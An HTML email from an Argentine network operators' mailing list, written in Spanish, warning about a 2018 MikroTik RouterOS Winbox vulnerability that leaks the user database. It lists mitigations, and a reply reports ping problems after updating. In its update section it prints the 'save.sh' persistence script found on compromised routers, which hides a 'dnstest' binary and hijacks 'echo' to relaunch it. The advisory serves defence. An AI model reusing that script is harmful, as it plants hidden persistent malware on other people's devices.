<html><head></head><body><div dir="auto">Estimados ojo con esa versión yo tube un par de problemas se me iban los ping altisimos . al parecer hay cambios en el enrutamiento<br><br></div>
<div class="gmail_quote" >En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <<a href="mailto:juanpablo@internetlocal.com.ar" target="_blank">juanpablo@internetlocal.com.ar</a>> escribió:<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">
<div class="entry-content" style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:1.62em;text-align:justify"><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">En el día de hoy <a href="http://mikrotik.com/" target="_blank" style="box-sizing:border-box;background-color:transparent;color:rgb(33,117,155);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">MikroTik</a> ha publicado un<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"> <a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" target="_blank" rel="noopener" style="box-sizing:border-box;background-color:transparent;color:rgb(255,0,0);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">alerta de seguridad</span></a> sobre una <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">vulnerabilidad en el RouterOS que afecta a todas las versiones desde la v6.29.</span></span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Según el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y que recomiendan actualizar <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ASAP</span> (<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">lo mas pronto posible</span>).</p><blockquote style="color:rgb(68,68,68);font-family:Georgia,"URW Bookman L",serif;font-size:inherit;box-sizing:border-box;padding:0px;margin:0px 30px 0px 60px;border:0px;font-style:italic;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;quotes:none"><p style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">La vulnerabilidad permite a una “<em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">herramienta especial</em>” conectar al puerto del Winbox y poder solicitar la base de datos de los usuarios del sistema.</span></p></blockquote><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Para tomar una medida al respecto se recomienda:</p><ul style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px 30px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;list-style-position:initial"><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Actualizar a la<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> v6.42.1</span> y <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">v6.43rc4</span> *<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,102,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Con precaución</span></span>(leer mas adelante)</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Cerrar el puerto del Winbox para el acceso publico</span>mediante un <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">address list</em> y el <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">firewall</em> en el chain <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">input</em></li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Limitar el rango de IP permitidos</span> en <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ip > service > winbox</em> a las redes locales unicamente.</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Cambiar las contraseñas de los usuarios.</span></li></ul><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Es importante tener en cuenta</span>que en las recientes versiones del <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">RouterOS</span><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> existe un nuevo esquema en el manejo del bridge</span>, porque lo hay que tener ciertas precauciones al actualizar debido a que se han dado casos de actualizaciones fallidas en configuraciones que tienen bridge y utilizan el chip switch.</p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">En caso de equipos que se encuentren en producción y no es posible actualizar rápidamente el sistema operativo, es <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)">mandatorio que se cierre el acceso del winbox y cambiar las contraseñas de los usuarios.</span></span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Por el momento no es posible conocer o detectar que el sistema ha sido vulnerado, por lo que también se recomienda aplicar el punto anterior.</p><p style="box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:inherit"><font color="#333333" face="Lato, sans-serif"><span style="font-size:17px"><a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255">https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255</a></span></font><br></p><h4 style="color:inherit;font-family:"Open Sans",sans-serif;font-size:18px;box-sizing:border-box;font-weight:300;line-height:1.62em;margin:0px 0px 18px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;letter-spacing:1px"><span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ACTUALIZACION</span></span>:</h4><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Algunos usuarios están reportan que detectan dos archivos dentro de <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">files</span></em> con el nombre de <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">dnstest</span></em> con contenido binario y <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">save.sh</em> c</span>on el siguiente contenido:</p><pre style="color:rgb(0,0,0);font-family:Monaco,Consolas,"Lucida Console","Bitstream Vera Sans Mono",monospace;font-size:12px;box-sizing:border-box;overflow:auto;padding:15px;margin-top:0px;margin-bottom:24px;line-height:1.62em;word-break:break-all;word-wrap:break-word;background:rgb(248,248,248);border:1px dashed rgb(227,227,227);border-radius:4px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit">#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</pre><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">El intento tiene el siguiente comportamiento:</span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Como se observa en la siguiente captura, el primer acceso es un intento fallido del winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego el acceso es con el usuario con permisos <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">full.</em></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><img src="https://i.imgur.com/7XbVAWy.png" alt="Comportamiento de Acceso" style="box-sizing: border-box; border-width: 0px; border-style: initial; vertical-align: middle; margin: 0px; padding: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; max-width: 100%; height: auto;"></p></div>
<pre class="blue"><hr><br>Lista mailing list<br>Lista@arnog.com.ar<br><a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista">http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista</a><br></pre></blockquote></div></body></html>